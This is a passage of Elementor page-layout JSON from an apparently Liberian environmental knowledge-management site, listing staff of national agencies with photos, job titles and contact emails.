questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong>\\n<p>Manager, ESIA <\\/br>\\nDepartment of Compliance and Enforcement <\\/br>\\nEPA\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental 